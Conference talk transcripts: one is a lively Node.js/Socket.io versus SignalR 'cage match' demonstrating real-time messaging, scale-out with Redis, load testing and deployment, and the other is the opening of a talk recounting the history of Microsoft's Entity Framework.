And so if I go over here, put that in. That is a little website deal. All my Node scripts and modules and everything here. And whoo. That wasn't me. So I can actually come over here. It's me. I can come over here and I can set a break point if I want to. And I can... You are asking for... I was so nice to you when you were doing it. I seriously... Because you needed help. And I felt bad for you. Because you were floundering. I hit click and if I come over to my debug window, it's fired. And so I can hover over this stuff and I can see the data coming in. No, I guess it hasn't fired yet. But I can hover over it and I can see all the stuff. I can browse it, take a look at it. It's very helpful. All right. That's the hard way, believe it or not. The easy way is, Hadi, this one's for you, my friend. WebStorm. So WebStorm is the IDE I told you about before. Without going into too much detail, I can start a project. I can tell it I want a Node.js Express app. Or I can do Twitter, Bootstrap, blah, blah, blah. So I can pick my view engine. I can tell it what CSS engine I want. I'm going to leave this just like this. I'm going to say, okay, it's going to start up this thing. It's actually going out doing NPM install Express. It's installing all my goodies for me. But I'm going to need to run this thing. And then here's my library. And what I can do is come in here and I can edit a configuration. I can tell it that I want to run this file. When the app starts, I hit OK. So I can come in here. The pink is not a good idea. Where are you, Hadi? Anyway, so I can just set a breakpoint right there and hit debug. Up it comes. Breakpoint hits. So that's the easy way. Cool. I got one last question before we get back. Actually, I completely forgot my question. I'm still ahead of all you guys. You're not asking enough. Rob, can you start in on, I want session management. So for instance, I've got two people on the thing. And if I click the button, only I see the result. But the other people that are connected don't see that result. Something like that. Is that what you did, Damian? Yeah. So I'm sort of expanding on that right now. Does that make sense? So you mean the reverse of that? It's like you click a thing. Fine. Either way. Yeah. Broadcast, I don't want to see my own events. Something like that. OK. What do you have? Yeah. So I'm just sort of refactoring my code a bit and adding a, I'm showing off another feature. So I've added connection tracking. So one of the things that these libraries will generally give you is the intrinsics to track when a person connects and when they disconnect. So in the hub world in SignalR, you implement these two interfaces, IConnected and IDisconnect. So you have methods that you would expect to have on interfaces that are called those things: connect, reconnect, disconnect. And then I'm just using a really ghetto way of tracking the people when they connect and disconnect. I have a static concurrent dictionary called connections, of string to object. So the connection ID is always a string, and the object is, I don't care, because I'm just using the concurrent dictionary as a way to store stuff. Concurrent is great because it means it's thread safe. I don't have to worry about locking it because it's a static collection in a web application. Because multiple people will be doing stuff on it at the same time.
So what I'm doing is this when connectors run, I am adding that connection ID to the concurrent dictionary and then I am broadcasting out a new invocation saying here is the current number of clients that are currently connected. So when it gets reconnected, I do the same. When it gets disconnected, I do the same. So the other thing I did was up in do stuff, I showed you using clients before which is how you broadcast an invocation to everyone who's listening. We also have another dynamic property called caller which lets you do the same thing but just to the person who invoked this method. So over here you can see caller.hello world, this is for the caller only. So assuming I am, and then what I've done on the client side, I know this is a lot, I was starting to add a whole bunch of different methods to my hub. So rather than using the syntax of hub.blah equals this function, hub.blah equals that function, I prefer to use jQuery's extend method which lets me extend my client side hub with just this object literal which is all the functions that sort of contain my client side methods. And so I won't implement update connection count just yet because I don't really need that just now. So let's go and have a look at what this does. So now if I click me, you can see I got this is the client speaking which was the message the client sent to the server and it broadcast out to everyone so the left hand side got it as well. And then this was this is for the caller only which was the server calling back via the caller.hello world. So this is for the caller only. And then this is the server speaking which was the value returned from that remote procedure call. So you can see that there are different ways that you can sort of get messages to the client and to all clients using hubs. Great. Cool. I'm going to go ahead and add some UI while you're speaking to show the connection count. Okay. I've got another, while you're doing that, my question here is Rob is typing JavaScript server and client. Right. So Rob is doing static C sharp and JavaScript. That's some dynamic C sharp. Dynamic C sharp. Okay. Okay. You're all right now. So. Man, I didn't mess with you once. You Aussie. So what does Rob have that Damian misses out on by doing JavaScript client and server? Can you pass whole functions or stuff from the client to the server? Is it easier to talk Jason back and forth? Well, in the demo that hopefully we'll get to when you're working, when you're working in JavaScript on the client and then you're working with it on the server and then if you use Mongo and you're working with it in Mongo, your head is in one place and it just, it's helpful, but it's also JavaScript. Okay. That's enough. What does that mean? It's when I hit like two keys at the same time or something. Sorry, keyboard. That's obviously too much for you to have. Can that JS make that deep in noise too? So yeah. Anyway. Okay. One thing I should mention really quickly before I get into the multi demo here. When you're using Express, you have a server file. For some reason they call it app.js, which is out of compliance with Heroku and didn't you, did I do that? That was me. I thought you went, that's weird. I'll put it back in. So this is a server configuration stuff all in here. So that's the best way to think of this. This isn't how you run your app. But if you want to use CoffeeScript, which a lot of people do, you can just say something like var cs equals require coffee script. 
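The $.extend wiring Damian mentioned a moment ago, extending the client-side hub proxy with one object literal of callbacks, looks roughly like this (the method names follow the demo; the selectors and exact signatures are assumptions):

    // Instead of assigning myHub.foo = function () {...} one at a time,
    // attach all the client-side callbacks in a single object literal
    $.extend(myHub, {
        personDidStuff: function (message) {
            $('#messages').append('<li>' + message + '</li>');
        },
        helloWorld: function (message) {
            $('#messages').append('<li>' + message + '</li>');
        },
        updateConnectionCount: function (count) {
            $('#connectionCount').text(count);
        }
    });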
As long as it's installed and then if you don't want to write JavaScript on the server, you don't have to. The whole thing just works with CoffeeScript straight up, which is kind of nice if you like CoffeeScript. So what were you talking about? Did you ask me a question? That was it. Well, I wanted to know if you know, if you can pass things back to the work client server and all that. Yeah, you certainly can. I passed the function in right here at the last socket emit. I passed the function in, which I'm actually going to delete right now. And the function was able to be fired back on the client. So there is some of that using eval and so on, which is evil. But anyway, what I've done here, I've changed things around so I can broadcast. And to do that with Socket.io, you just put broadcast in front of anything that you want to do, any operation. So send just uses a default transport mechanism, and it fires an event on the client called message. So in the very beginning, the first demo I showed, I responded to that event. I said, on message, take the data that comes in and then pop it using jQuery into the status div down here. In fact, let me make that an H1 so we can see it. So at this one, I don't want to just send the message straight out. I want to broadcast it to the other browsers. So if you use the word broadcast, it automatically knows, don't send it back to who just called me, just broadcast it to every other connection except for this one. And then I'm going to do socket.send message sent, and that should go straight back to client who called only. If that makes any sense at all. Go ahead, Wheeling, this will work. And so I go here. Okay, you ready to rejoice in my failures? Oh, and I don't even have another browser open. Nice demo, Rob. Okay, so I'll click here, message sent. This is the client calling. So that was the message that got broadcast by my code over here. Client calling, this is the client calling. So you can see these two are different. If I click that, this one's message sent, and this one says this is the client calling. So that's how you work with broadcasting. Okay, nice. So while that was happening, I just added connection count. Using that code I showed you before, I now have some UI that's actually being updated. And I have two browsers, so it's two at the moment. If I hit F5, you'll see it goes up to three. If I hit F5 on the right, it goes up to four. So what happens there is when you hit F5, the connection that you had open obviously goes away because the connections don't persist across page navigations. They only live as long as the page is open. And so, and then after some period of time, the web server will tell us that that connection is no longer valid. And we will clean that up, get rid of it, and the connection count will go down because we'll fire the disconnect message on your code. And so that count will go down. You probably saw that go down, it went up to six or eight before or something. Now there it goes, it's gone down to two after about 20 seconds. So we have two types of disconnect in SignalR. We're still working on these intrinsics because it's something that's really, really difficult to get right, especially in sort of web farm scenarios. But there's a graceful disconnect where we'll attempt to actually send a disconnect message to the server. The version in NuGet doesn't have that capability, which is why that took 20 seconds. Whereas the version in source right now listens to Window Unload. 
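Rob's broadcast-versus-echo wiring from just above, roughly (Socket.io 0.9 style; send() raises the built-in message event on the receiving side, and the #status selector is from his earlier demo):

    // Server: relay to everyone except the sender, then echo back to the sender only
    io.sockets.on('connection', function (socket) {
        socket.on('client calling', function (data) {
            socket.broadcast.send(data.msg); // every other connected client
            socket.send('message sent');     // just the client that called
        });
    });

    // Client: the default transport fires a 'message' event
    socket.on('message', function (data) {
        $('#status').html(data);
    });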
And if the browser will let us, we'll send a packet to the server saying this connection is now gone. And so the count will go down immediately. But eventually we have this background process that just sits there and cleans up connections. And that's a good event to listen to. So you can do a pop up that says, we noticed you're leaving our website and would you like to subscribe to our website? Right, do you want to fill in this survey and do you win a million dollars? Okay. Maybe. So Damian's talking about client disconnection. On Node, can you do the same? Can I track disconnect? Yeah. So what the socket will do is if you get disconnected, it'll what? Socket, yes, not Node. Sorry, go ahead. That's okay. Socket.io will actually buffer what you're doing. And this is actually a good discussion to have too. It'll buffer the messages and it'll wait for the client to reconnect. And I don't know how long the buffer queue goes, but it'll just wait, wait, wait, wait, wait, and then you come. Buffer in. Oh, great. Thank you. Another thing a lot of people ask is, you know, Node is single threaded and you know, everybody says. Rob likes to buffer. Node can scale a lot. Oh man. Okay, fine. Save in the site. Did you just say scale? Node, everyone says, no, everyone says Node can scale, Node can scale. Infinitely. Non-blocking. Yes, exactly. And that's kind of one of the neat features about it. Hopefully we'll get to a load test demo. Fibonacci.js. Exactly. But if you only have one machine and one process, if that process goes down, everything dies. So a lot of people say, well, what happens with your, you know, scalable groovy Socket.io app? And one thing you can do is I'm just using the default memory store. So when a message comes in, it's popped into memory and then broadcasts back out. You can use Redis for that and you can have Redis on a third machine. And your scaling plan is just whatever web servers you want. Socket.io on each web server is going to then talk to the Redis machine and the Redis machine using PubSub and Redis is going to pop it out to all the other things. So it's just kind of handy. Let's do that. Yeah, let's do. So I'm going to start Redis because that sounded really cool and I want to get in on the party. So here's Redis running. This is Redis for Windows, from MS Open Tech. Have you all heard of MS Open Tech? Okay, let me evangelize for a moment. MS Open Tech is a wholly owned subsidiary of Microsoft that was recently announced about three weeks ago or something. That does nothing but open source software. So it's the way that Microsoft contributes to open source. What is Microsoft? I can't compete with your hipster Mac voice effects. Start with my own voice, of course. Rocket, damn you. And the first thing that they announced was a port of Redis to Windows. It's available on GitHub. I literally just went to GitHub, cloned the repository. You can see that in my console window here. Open it in Visual Studio, compiled it, C++, went to the command line and started redis-server.exe. And that's all I've done. I haven't configured it or anything. So it's running on whatever port it said it was running on. So I'm running Windows 8, 3, something, 6379. 6379. Yep. So now what I'm going to do is start two web servers. Because if we want to show scale, it helps if we have more than one server. So I've got my little start farm script. So this is two instances of IIS Express. Who's used IIS Express? Okay.
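The Redis-backed scale-out Rob sketched for Socket.io is configured along these lines (based on the Socket.io 0.9 wiki pattern he refers to in a moment; io here is assumed to be the result of require('socket.io').listen(server), and the require path for the redis client may differ in your setup):

    // Three Redis connections: publish, subscribe, and general commands
    var RedisStore = require('socket.io/lib/stores/redis'),
        redis = require('redis'),
        pub = redis.createClient(),
        sub = redis.createClient(),
        client = redis.createClient();

    // Each web server's Socket.io instance relays messages through Redis pub/sub
    io.set('store', new RedisStore({
        redisPub: pub,
        redisSub: sub,
        redisClient: client
    }));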
When using SignalR, if you're not running a server OS, so I'm running Windows 8 desktop, not server. So you have to, have to, have to use IIS Express because IIS on Windows 8 desktop has a concurrent connection limit of 10. And as you saw, when you hit F5 in your browser, the connection stays around for a while. So if you're using SignalR and you're making persistent connections, you'll hit F5 three times and then everything stops working, which isn't a lot of fun. So make sure you use IIS Express. Also it's awesome. So you may as well just use it. You can fire it up from the command line like I'm doing here. To say to IIS Express, go and start hosting this folder, which is exactly what I've done here. I've got two instances of IIS Express, different ports, same folder. So now if I go to my browsers and I go to, I think it's localhost, I've got one on 8090. I think the demo is move shape. Okay. And then I've got one here, which is on 8091 move shape. Now this won't work because I know at the moment I haven't configured this application to use Redis. So let me open up the application and show you just how easy it is to actually configure this to use Redis. Does this seem practiced to anyone? Just out of curiosity? I may or may not have shown this yesterday to some people in the crowd. Oh, really? Yeah. Go on. That's okay. Well, I'm sure it's going to be the same for just as easy on socket.io, right? Yeah. Right? I've done it. Okay, so I'm opening up that solution. I'm just going to go into my startup and comment out this assembly attribute, which is what's kicking off the Redis sort of wire up. F5. F5 that again, that's a known bug. It's a really pretty UI change you did there, buddy. I like it. Let's try that again. It's a lovely shade of yellow. Can you get a yellow screen of death on? Yes. We should have updated the yellow screen of death for 4.5. I think it just swallows the error. There we go. If we open up, if I get my consoles open, there's my one web server down here, one web server there, Redis in the middle. Now I'm going to hide them. Let me push this up and hide that. Voilà. Then you can see stuff happening via Redis, which is kind of cool. Cool. There you go. Wow. Yeah. Webfarm in a box. That's scale out, right? It's nice. Rob, do you like cake? I like cake. That's a Hanselman thing. Yes. When you don't know what to say, do you feel like a complete idiot? I like cake. To pick up on what Damian is talking about, one thing about Redis and Express and Node in general is that you pick what you want and you enable it. That's one of those things that's in the community. Here is, at Socket.io, there's modules that you can plug in. This actually is just the wiki to show you how to configure it, but if you want to use a Redis store, you just tell it you're using Redis store. You can use different Redis stores for Pub and Sub, publish and subscribe if you want. Here is just creating three clients using, and this supposes that you have Redis installed and also required in your app. Then you just say, Socket.io set the store to a new Redis store and then you just set each one of those things and you're rocking on Redis. I don't have a demo, sorry. But what was I going to show? Should we talk about how to do load tests? Let's do load. Let's bring it. I want to see web scale. Yeah. This is actually funny. I want to make this point. I made it in my talk the other day. What Node is good at is delegating the IO stuff.
In other words, delegating database, delegating file system hits, delegating all that crap and then it goes and it keeps its little CPU executable process just doing computation. If you have a synchronous system like Ruby on Rails, Ruby on Rails, when you come in and you hit a database, you'll have some code, code, code, database hit and it'll wait. Just sits there and waits, waits, waits. Result back, feed it back to the request. You're blocking a thread. Node doesn't do that. Node just takes the call. It says, okay, you got a database hit coming in. It hands it off to the event loop and then goes and does other stuff and checks back later for what's down at the bottom of the event loop. That's how Node scales. It's not a silver bullet or anything. It does help when you're doing evented stuff. To show how to do a load test with Node, there's this really groovy thing. I think this is it. Nodeload. Yep. Nodeload is a Node module. You can just install it and run a few commands and that is exactly what I'm going to do right here. While this is going down, to run it, it gives you some examples. As always, you can actually load test your app with some pre-configured scripts that it gives you, which is kind of handy. I've gone through the directions here, install nodeload and I am going to go into the module directory after it's installed. Cool. node_modules, nodeload. Now I'm in here. It gives me a handy dandy command. Where is it? To run a basic nodeload test. I'm going to copy that. Yes, I've got to run this in one line. Examples, test-server.js. By the way, you don't need to do this crazy command. You can have your load test.js file right in the root. I'm just trying to use their examples. That's why you're seeing me enter this craziness right here. Test-server.js. Then I've got to pass it. I'll run it in the background actually. That's up and running. It's forked a process and it's running in the background. Then I'm going to go, let's see. Actually, I should have run that all at once. Great. I ran it in the background and forked it. Hey, look. While that's happening. Let's see. One more time. Please, sorry for the delay. I have that too. That's awesome. There we go. Okay. I'm fumbling around in Perfmon trying to find. Here we go. I'm not alone. I'll put that there. I'm trying to think of when you nodeload test, you load node test or there's something there. Good. Okay. This is now running and working. Test-server.js, I'll just show you the file really quickly. It is inside nodeload, inside examples, inside test-server. This is a nodeload test. The idea would be if you want to load test your app and see what's going on, you would take something like this, put it in the root, gitignore it, whatever you want to do. All this thing is doing is randomly setting a timeout on the response. It's just saying maximum delay is 500 milliseconds, Math.round it, plus 1000. Let's see what's going to happen. Then it's listening on port 9000. That's it. The command that I just gave it was to do 10 clients, maximum 10 requests or 10,000 requests. I don't know what dash i means. So let's see. If I go to, it says good. I think it's 8080 that it's running on. Oh yeah. Localhost 8080. Come on, run. Oops. That's nice. Okay. Well, while you're making that work. Did I crash that? Yeah, go ahead. Go ahead. So what do you got, Damian? The equivalent in the IIS, ASP.NET world is the tool called WCAT. So the IIS team puts out this Web Capacity Analysis Tool that you can use to generate load, HTTP load against your server.
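The little test server Rob pulled up, a handler that answers each request after a random delay, boils down to something like this (the delay numbers come from his description and may not match the shipped example exactly):

    var http = require('http');

    http.createServer(function (req, res) {
        // up to ~500ms of random delay on top of a 1000ms base
        var delay = Math.round(Math.random() * 500) + 1000;
        setTimeout(function () {
            res.writeHead(200, { 'Content-Type': 'text/plain' });
            res.end('hello');
        }, delay);
    }).listen(9000);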
So while it's not specific to ASP.net or node or anything, you can use this to generate load against anything that can take an HTTP request. So I'm going to use it to simulate listening SignalR connections. SignalR has this performance test harness called Flywheel, which is on GitHub. And it is an endpoint and a dashboard that gives you a whole bunch of stats about what you're, sort of what performance you're currently getting. And so at the moment, I have no one connected to the endpoint. You can see there's no connects. So I'm going to come down to my console and I'm going to start up a batch file that you can get from our crank repository. We have another repository called crank, which contains these settings. And that's going to start up a thousand virtual clients on this box. This is just, this is a three year old notebook, so I don't expect an awful lot. But we should see the connection counts now going up. You can see that over here. So I'm getting connected SignalR clients. I'm not broadcasting anything yet. I'm going to wait until it gets to a thousand. So that's about there. So I'm going to come over here and say, let's go and broadcast five messages a second to all 1,000 clients. And you can see my sends per second now has grown to around 5,000 sends per second. And so my little graph is showing me that I'm getting 5,000 sends per second through SignalR to my thousand virtual clients. And my CPU, while it looks like it's really busy, most of it is actually drawing that stupid graph. 36% of my CPU, 35, IIS is actually only using like 40% of my CPU. So we do know from the current version of SignalR on my perf rig at home, which is a three year old Core i7 920, so a first generation i7, I can do with about 5,000 users on a separate machine about 30,000 sends a second. Now at that point, our bottleneck isn't CPU. We have some architectural issues in the core of SignalR, which we're going to be fixing in 0.6, and we hope to double, if not triple that number. So we have very smart people on the ASP.net team working on this now, now that it's not just me and Fowler doing it in our spare time, we have people smarter than us who are helping us sort of re-architect the core of it to make it better. But yeah, this is kind of cool. You can just get this from GitHub and try it yourself and see what sort of performance and resources you'll need. Okay, we've got like eight minutes left. Okay, I just want to really quickly point out. I forgot to fork the request. You do that in the command line by passing it an ampersand right there, so I forgot to fork it and it wasn't running properly. So I'm up to... Wait, while you're doing this, it would be cool if we can do some deployment. So I was thinking Damian could start in trying to deploy it. Get it into the clouds or wherever you want and then you can talk about... Yeah, I'll just finish this up real fast. So this is just spewing back requests. There's a throttle on the Mac, unfortunately, that kills a certain amount of requests. So I wish I could do as much as Damian was doing when I can't. But the point is, it spits out this really nice graph. You don't have to just test locally. I could test remotely. If I could see Damian's port, I could load him up with a million requests a second. Melt his laptop, which would be kind of fun. But this is outputting a chart... 401 unauthorized. 401, right. So you can see the line is pretty flat and that's what you want to see. Also the CPU right here under the node... Stop it.
So node is running at 1.5% of my CPU. And if you were to see me, where are you? So I got two processes running because I got one server running and I got node running the load test. If you were to see my talk yesterday when I wound node up, it pegged my CPU 100% with an infinite loop. So this is actually nothing. And so the requests are coming in at pretty high volume. Ryan Dahl has an amazing demo that he does where he nails node on his little laptop and flat lines the request. It's a really nice thing to see. You go, Azure Boy. Well, so I was talking to Rob on Sunday about this a little bit and I was, you know, Damian, we're thinking it'd be cool to actually deploy this. So... This is the first time I have ever deployed anything to Azure and that didn't work. How will this second time... Oh my God! Look at that. Oh! Touchdown! Thank you. So that's using the new Azure websites. I'm going to be a dancing girl right now. That's using the new Azure website. So we... I can't see. Yesterday. And so I set this up before we came in. I literally just went and signed up for the preview. I created a website called NDC Cage Match. But as you saw that screen before, I hadn't deployed anything to it. It said the site was created. I'd never deployed anything to it. I downloaded the publishing profile, which you can do from the Azure portal. I imported that in Visual Studio. You probably saw me do that right now. And then I hit publish. The first one... Azure is TDA. Sorry. What? What? It does my laptop. There's no leak. I'm amazing. I'm amazed. I'm amazing. So all I had to do was retarget from 4.5 to 4.0 because the websites feature of Azure currently doesn't support .NET 4.5. But I did at the same time provision a Windows Server 2012 RC, what do you call them? Durable VM. Right. So if I wanted to, I could actually publish this app to a Windows 8 server, basically, Windows 2012 server. And I would get WebSocket support in Azure as well. So that would be kind of nice. Cool. I'm pointing you guys at a Hanselman post. I tried to get this thing going before the talk. The collision of timing of the announcement and the demo just didn't work. But the app I just wrote could be pushed up there. It does not support WebSockets. Neither does Heroku and most hosting services. But Socket.io, as I mentioned, abstracts that away. So I could have, had I some time, pushed my app up to Azure as well. And yeah, if you want to know more, go see Hanselman's blog. I could also have deployed it to Heroku. There's nothing that stops you from having a socketed application, even if they do block WebSockets. So. Nodejitsu. Andrew says that Nodejitsu, he thinks, supports WebSockets. And also, if you have a VM, I think, at Amazon, I think you can do it. Right. That's, Damian was looking at that this morning too. And I thought it was cool, and we were looking at that post earlier, but you can get push to deploy too for Node, kind of neat. Okay, so we've got roughly four minutes left. Now's a good time for questions if you've got them. What's this line right here? Question? Web.config in my Node app? No way. So the question is, when you've got WebSockets support, are you worrying about the client or the server? You know what I mean? It's a really interesting question. You go first. Sorry. What was the question? Who needs to support? Both. So in the .NET world, WebSockets on the server in ASP.NET requires Windows 8 server and ASP.NET 4.5.
The reason is that WebSockets needs to be supported at the HTTP handshake level, and that's done in Windows by HTTP.sys, which is a kernel mode driver. It's one of the reasons serving Web traffic on Windows scales really, really well: you can actually serve files directly using I.O. from the kernel level without ever getting into user mode, which makes it really, really fast. But it means you have to rev the operating system when you want to make changes to that because it's a kernel mode driver. But SignalR can be hosted on more than ASP.NET. We're not actually tied to ASP.NET. So you can host SignalR on top of whatever you like, your own EXE. You can put it on one of the open source Web servers like Kayak or Firefly, which just use raw sockets, and they can do WebSockets just fine. Okay. And then as you mentioned earlier, there's the client side too. You've got to worry about it if you're the client, but you've got the graceful fallback down to forever frame. Yes, all browsers support WebSockets, including IE10, which we all have, right? With Socket.io, as with all things Linux and Unix, it's not exactly easy to get this running on any server. So if you're using Nginx, you actually have to, I don't believe WebSockets works with Nginx 1.1. I might be wrong; if there are Socket.io guys here, shout it out. But there's a build of Nginx that you can install. And if you've ever done Rails, you know there's like a little shim kind of thing called Phusion Passenger that will sit behind your server and will monitor your Node.js thing. So if Node goes down, it reboots, it pops it back up. So just to point this out, I used Express just because I wanted it to support. You don't have to. Socket.io stands on its own. So you can just require HTTP as you see right here. And that's just the core Node HTTP response. And then listen with Socket.io and it'll run. So you mentioned a few things. One is a passenger, Phusion Passenger. And the idea that Node.exe is just an EXE, and if it dies, it dies, right? So IIS you've got over there is monitoring and restarting and doing all that stuff. But you've got other things that you use kind of to host and support Node as well. Okay. Any more questions? Question? Yeah. So the question is from hubs, can you send to a different client rather than just broadcasting to everyone or the one that called you? Yes, you absolutely can. Let me just bring that up very quickly. I stupidly closed that project. I think it was number 14. Yeah, I should mention while he's doing that that both SignalR and Node support the concept of rooms. And they also support the concept of knowing who a client is. We didn't show any authorization, but you can have authorization down on the socket calls. One of the things I forgot to mention, this about Nginx too, is there's a lot of port blocks out there. So if you're using WebSockets or Socket.io with anything, if you send it over 443 over HTTPS, you generally have no problems. That's according to them at least. So I just want to throw that out there. So as you can see here, the Clients property is also an indexed property. So you can pass into it either a specific client ID, which you can get from, in the case of hubs, you get that from Context.ConnectionId. So you can squirrel that away and store that wherever you need to. So generally what you'll do in a SignalR app is you have some type of authentication like you normally do, and you have a username.
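Backing up to Rob's point that Socket.io stands on its own without Express, a minimal standalone setup looks roughly like this (port and payload are placeholders):

    // No Express required: attach Socket.io to a plain Node HTTP server
    var http = require('http');

    var server = http.createServer(function (req, res) {
        res.writeHead(200);
        res.end('ok');
    });

    var io = require('socket.io').listen(server);

    io.sockets.on('connection', function (socket) {
        socket.send('welcome'); // raises the 'message' event on the client
    });

    server.listen(3000);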
And then you have some way of storing for a given username one or more connections that they're currently using. And then you shove the connection ID in there so that if someone says, I want to send a message to Damian, you look up the connection IDs and you send it to those connection IDs. Similarly, we have groups. So there's an add to group. I think it's Groups.Add. So you can add a connection to a group or remove them from a group and then you can send just to that group. Yeah, and Socket.io is almost exactly the same. More questions? Last question? Nope. I'm ready to declare a winner here, which is me. I am the winner. I appreciate your guys' trying or whatever. But thanks a lot to these guys. Give me a hug. Thank you.
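For completeness, the rooms concept both sides mentioned, the Socket.io analogue of SignalR groups, works roughly like this (room and event names are placeholders):

    io.sockets.on('connection', function (socket) {
        socket.join('fans'); // add this connection to a named room

        // send to everyone currently in the room
        io.sockets.in('fans').emit('announcement', 'hello, room');

        // or broadcast to the room excluding the sender
        socket.broadcast.to('fans').emit('announcement', 'someone joined');

        socket.leave('fans'); // and take them back out
    });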
|
You can't have a conversation about web technologies these days without someone dropping a mention of NodeJS and web sockets. If you're a .NET developer, someone will then reference SignalR with ASP.NET Web Pages or MVC. But what are these things? Which one is better? What do they do and how do they work? In this special "Cage Match" Rob Conery puts NodeJS up against Damian Edwards and SignalR - showing you the two technologies side by side in a bit of a tongue-in-cheek challenge.
|
10.5446/50988 (DOI)
|
All right. Hello, everybody. Hello, everybody. Hello. My name's Scott Allen. Thanks for coming out to this session. What I want to do is show you a few new features that are in the entity framework, but I also want to take some time to look back at a history of the entity framework because in thinking about the entity framework over the last few years, I've realized there's a lot of lessons that we can learn as software developers from how the entity framework originated, how it was delivered, how the entity framework took on feedback from the team. So I'm hoping we can first learn a little bit from the entity framework and then see some of the things that they did to learn from those lessons and some of the new features that they've added to entity framework 4.x and beyond. The entity framework was released in the first version in August of 2008. That was one month before Lehman Brothers, which was the fourth biggest investment bank in the United States before they declared bankruptcy and the world descended into economic turmoil. I'm sure that's just a coincidence. But the story of the entity framework actually starts much earlier than that 2008 release because Microsoft really, they have a long history of delivering tools and frameworks that are very data-oriented. A lot of people had great amounts of success with these products. So Visual Fox Pro and Microsoft Access are two examples of applications that help you to paraphrase what was in the keynote the first day to help you induce vomiting on the database, right? Help you leave it, throw up data on the screen in a nice way, not in a drunk disorderly way, but more of a friendly vomiting on the screen. And now we have Visual Studio Light Switch, sort of has the same purpose. I have a database, I want to get data on the screen, allow me to page it and filter it and sort it. As.NET developers, we've typically avoided those types of tools. And if we looked at the landscape in.NET 1.0 when the framework first shipped, really the only thing that we had to be able to access data was the stuff in the system.dataminspace. So we had commands and data readers and data sets. And the data set was kind of an interesting class in the sense that you could have data tables and a data set and those tables could have relations and you could have constraints and form views to do filtering and sorting all those tables, but they are all data oriented, it was still data oriented. And in.NET 1.0, most of us were doing object oriented programming or trying to do object oriented programming and languages like C sharp and Visual Basic. And we didn't like the data oriented approach of this data set, which was really an in-memory database if you think about it, minus the transactions and a few other features. So what we really wanted to do was get data out of the database and put it into objects and a lot of people found different ways to do that in the early versions of.NET. Third party vendors provided tools and there was code generations and there was the early object relational mappers and we thought we were going to get something from Microsoft in the form of a project called object spaces. Anyone here of object spaces remember that? Just a couple people. So it was about 2003 when Microsoft said we're working on this thing called object spaces and this is one of the early architecture diagrams of this framework that was in MSD and magazine and it's conceptually simple, right? It's an object relational mapper. 
I have an application, inside of that application I've.NET types defined. If I have an instance of that type I want to be able to take it, pass it through object spaces and put it in a database. Not worry about SQL connections, SQL commands, SQL parameter, all that other stuff. And if there's something in the database I want to get out, I should be able to somehow tell object spaces that I want the account with an ID of one and it just gives me back an object. Again, no parameters, connections, commands, any of that stuff. We were looking forward to that coming out in Visual Studio 2005 but around 2004 Microsoft said no, wait, we're not actually going to ship object spaces. What we're going to do is take object spaces and put it in something and make it even better. We're going to put it in something bigger. It's going to be part of one of the pillars of the Longhorn project. Anyone remember Longhorn? That was an operating system code name that's about when Microsoft hired Richard Scoble to dress like a Viking and go around and blog and scare people. It became the Windows dista operating system. There was a lot of celebration when that operating system shipped. That was kind of short lived. But object spaces, it might be hard to see on the screen but over here under the WinFS category, that's object spaces now. It was an object relational mapper but now it was just a small part of this big framework that Microsoft had great aspirations for, WinFS. WinFS was going to be the technology that was all things data access. Just like Avalon was going to be all things for the presentation logic, Indigo which became WCF was going to do everything for communication. WinFS was going to be able to talk to relational data, semi-structured data. The idea was that you could read data out of Microsoft money and Microsoft Flight Simulator just as easy as you could Microsoft SQL Server. It was just going to be pure magic. Unfortunately, well, before we get to the unfortunately part, this was how it was described in an early article. It was going to be a quantum leap in the way that we develop and work with information. And again, another architectural diagram of WinFS and the important part to take away from this is that they were thinking about link but they were also thinking about all these other things around data, how to sync data, how to back up data, how to read data out of images on the file system, think about different schemas, different data models but compare that diagram to what we saw earlier and it's a lot more confusing picture now, right? It's no longer, here's an application, here's a database, just give me something to move data back and forth. Now we have all these different sorts of concepts and crazy things going on and to a large extent that's why WinFS never shipped. Microsoft eventually said we're not actually going to ship WinFS with Longhorn and then eventually they said we're not going to ship it at all and to some Microsoft people that were brave enough to blog about this, they actually described WinFS as a black hole. Now why am I going through all of this? It's because Microsoft promised that when they canceled WinFS, they said we're going to take a lot of the concepts and ideas from WinFS and deliver them in other technologies and it turns out a lot of the ideas that went into the entity framework came from this WinFS technology but the problem with this technology is that the architecture astronauts got a hold of it, right? 
You've heard of the term architecture astronaut, just Google Joel Spolski has a couple blog posts on this topic and the primary problem is that an architecture astronaut is so smart that he looks at a or he or she looks at a specific problem like accessing data in a relational database and says that specific problem is really just a general case of a bigger problem which is I want to access data which is a bigger case, a special case of an even bigger problem of, you know, I need to get some stuff all over my enterprise which is just a specific case of a bigger problem which is world hunger so we're going to solve it all, right? We're going to solve all those problems but we're going to forget to actually ship something so lesson one from all of this is that you don't let the astronauts solve the customers problem because they over generalize things too much. That's lesson number one from the entity framework. So as I said some of those ideas in WinFS, they filter themselves into the entity framework. In fact this is a quote from Quentin Clark who was one of the PMs on the WinFS team who said the APIs that you see in the entity framework of ADO.net they came basically out of WinFS. And so when the first version of that entity framework did arrive in 2008, this was the architecture diagram for it. Again, a lot more complexity in there than the simple object spaces framework that we were expecting four or five years earlier. The centerpiece of the entity framework was this conceptual data model and the idea was that a developer or someone on a development team would build this conceptual data model that would isolate them from the specifics of database schemas and allow them to describe the ideal world that they wanted to program in and then program against that conceptual data model and in the background somewhere it would be able to access databases. Is that the Rob Connery session blasting all the music over there? Geez, that guy. So a lot more complicated is this diagram but it really went beyond that. The astronauts were still in charge because they were saying we're going to deliver a framework with this entity data model that's going to access relational databases, it's going to allow developers to get the SQL server but it's also going to allow information workers to do reporting off of this with reporting services. It's going to allow people in office to synchronize data to the cloud, again, trying to solve all problems for all people, very far away from what we really just wanted which was a simple object relational mapper. And so when the entity framework shipped, the ironic thing is they had all these visions about doing all things data for all these people but the only thing it could do when it shipped was talk to SQL server. In fact, the only thing you could do is reverse engineer SQL server database to create that entity data model and talk to SQL server but they had a focus on so many other things that immediately or even before this thing shipped, people started blogging and talking about limitations in entity framework version one, unimplemented link operators. Even though it was designed for this model, to build this entity data model, you couldn't actually do a model-first design. You had to have a database in place first. And then the last bullet point there was the kicker for a lot of people and that was the performance of the entity framework wasn't that great. 
